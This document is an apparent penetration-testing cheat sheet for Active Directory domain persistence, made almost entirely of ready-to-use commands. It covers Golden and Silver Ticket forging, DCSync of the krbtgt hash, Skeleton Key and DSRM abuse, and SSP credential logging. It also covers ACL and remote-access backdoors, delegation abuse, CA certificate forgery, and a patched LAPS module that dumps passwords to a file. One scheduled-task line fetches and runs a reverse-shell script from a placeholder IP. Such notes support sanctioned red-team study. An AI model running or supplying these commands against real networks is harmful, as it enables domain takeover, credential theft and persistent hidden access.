- Golden Ticket
- Silver Ticket
- Skeleton Key
- DSRM
- Custom SSP - Track logons
- ACL
- Computer Account
- Active Directory Certificate Services
- Get the krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <COMPUTERNAME>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
.\SafetyKatz.exe "lsadump::lsa /patch" "exit"
.\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
- Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process
- To get the SID use
Get-DomainSID
from powerview
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /krbtgt:<HASH> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /krbtgt:<HASH> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
Get-wmiobject -Class win32_operatingsystem -ComputerName <COMPUTERNAME>
- Use the hash of the local computer
- Other services are HOST, RPCSS, WSMAN
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:CIFS /rc4:<LOCAL COMPUTER HASH> /user:Administrator /ptt"'
ls \\<SERVERNAME>\c$\
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:HOST /rc4:<LOCAL COMPUTER HASH> /user:Administrator /ptt"'
schtasks /create /S <target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S <target> /TN “Reverse”
Execute for WMI /service:HOST /service:RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:HOST /rc4:<LOCAL COMPUTER HASH> /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:RPCSS /rc4:<LOCAL COMPUTER HASH> /user:Administrator /ptt"'
Get-wmiobject -Class win32_operatingsystem -ComputerName <target>
Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <TARGET>
- look for the local administrator password
Invoke-Mimikatz -Command '"token::elevate” “lsadump::sam"' -Computername <TARGET>
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<DC NAME> /user:Administrator /ntlm:<HASH> /run:powershell.exe"'
Enter-PSSession -ComputerName <COMPUTERNAME> -Authentication Negotiate
- Drop mimilib.dll to system32 and add mimilib to HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
SetItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' Value $packages
all logons are logged to C:\Windows\System32\kiwissp.log
Invoke-Mimikatz -Command '"misc:memssp"'
Get-ObjectAcl -DistinguishedName "dc=<DOMAIN>,dc=<TOP DOMAIN>" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights All -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights ResetPassword -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights WriteMembers -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Invoke-SDPropagator -showProgress -timeoutMinutes 1
#Before server 2008
Invoke-SDpropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
Get-ObjectAcl -SamaccountName "Domain Admins" –ResolveGUIDS | ?{$_.identityReference -match ‘<username>’}
Add-DomainGroupMember -Identity "Domain Admins" -Members <USERNAME> -Verbose
or
Net group "domain admins" sportless /add /domain
Set-DomainUserPassword -Identity <USERNAME> -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force ) -Verbose
Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=<TOP DOMAIN>" -PrincipalIdentity <USER> -Rights All -PrincipalDomain <DOMAIN< -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=<TOP DOMAIN>" -PrincipalIdentity studentuser1 -Rights DCSync -PrincipalDomain <FQDN DOMAIN> -TargetDomain <FQDN DOMAIN> -Verbose
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
. ./Set-RemoteWMI.ps1
Set-RemoteWMI -Username <USERNAME> -Verbose
Set-RemoteWMI -Username <username> -Computername <COMPUTERNAME> -namespace ‘root\cimv2’ -Verbose
- Only root/cimv and nested namespaces
Set-RemoteWMI -Username <username> -Computername <COMPUTERNAME> -Credential Administrator -namespace ‘root\cimv2’ -Verbose
Set-RemoteWMI -Username <USERNAME> -Computername <COMPUTERNAME> -namespace ‘root\cimv2’ -Remove -Verbose
Get-wmiobject -Class win32_operatingsystem -ComputerName <COMPUTERNAME>
. ./Set-RemotePSRemoting.ps1
Set-RemotePSRemoting -Username <USERNAME> -Verbose
Set-RemotePSRemoting -Username <USERNAME> -Computername <COMPUTERNAME> -Verbose
Set-RemotePSRemoting -Username <USERNAME> -Computername <COMPUTERNAME> -Remove
Using the DAMP toolkit
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval
Add-RemoteRegBackdoor -Computername <COMPUTERNAME> -Trustee <USERNAME> -Verbose
Get-RemoteMachineAccountHash -Computername <COMPUTERNAME> -Verbose
Get-RemoteLocalAccountHash -Computername <COMPUTERNAME> -Verbose
Get-RemoteCachedCredential -Computername <COMPUTERNAME> -Verbose
Set-DomainObject -Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/us-dc.us.techcorp.local"}
Set-DomainObject -SamAccountName devuser1 -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser –TrustedToAuth
kekeo# tgt::ask /user:<USER> /domain:<DOMAIN> /password:Password@123!
kekeo# tgs::s4u /tgt:<KIRBI FILE> /user:Administrator@<DOMAIN> /service:ldap/<FQDN DC>
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI FILE>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
Rubeus.exe hash /password:Password@123! /user:<USER> /domain:<DOMAIN>
Rubeus.exe s4u /user:<USER> /rc4:<NTLM HASH> /impersonateuser:administrator /msdsspn:ldap/<FQDN DC> /domain:<DOMAIN> /ptt
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
- https://github.com/Kevin-Robertson/Powermad
- Low privilege if not added to the domain admins group
New-MachineAccount -Domain <DOMAIN> -MachineAccount <NAME OF MACHINE TO ADD> -DomainController <IP> -Verbose
runas /netonly /user:<DOMAIN>\<COMPUTERACCOUNTNAME> powershell
- Important to look at:
- The validity period
- Authorization is not required.
- Who has enrollment rights.
.\Certify.exe find /clientauth
- Uses the current user
.\Certify.exe request /ca:<CA NAME> /template:<TEMPLATE NAME>
.\Certify.exe request /ca:<CA NAME> /template:<TEMPLATE NAME> /machine
- Execute on the CA server. You can generally tell this is the private CA key because the Issuer and Subject are both set to the distinguished name of the CA.
- https://github.com/GhostPack/SharpDPAPI
.\SharpDPAPI.exe certificates /machine
- Save cert + key in a cert.pem file
- Set a password, password
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@<DOMAIN>" --NewCertPath fake.pfx --NewCertPassword "password"
cat cert.pfx | base64 -w 0
.\Rubeus.exe asktgt /user:Administrator /domain:<DOMAIN> /certificate:<BASE64 CERT> /password:password /nowrap
[System.IO.File]::WriteAllBytes("C:\Users\public\<USER>.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))
- The password will still reset if an admin uses the Reset-AdmPwdPassword cmdlet; or if Do not allow password expiration time longer than required by policy is enabled in the LAPS GPO.
- Must run from system
Set-DomainObject -Identity <COMPUTER> -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
- https://github.com/GreyCorbel/admpwd
- add the following after the first line.
- Recompile and replacet the dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);
var line = $"{pi.ComputerName} : {pi.Password}";
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);
WriteObject(pi);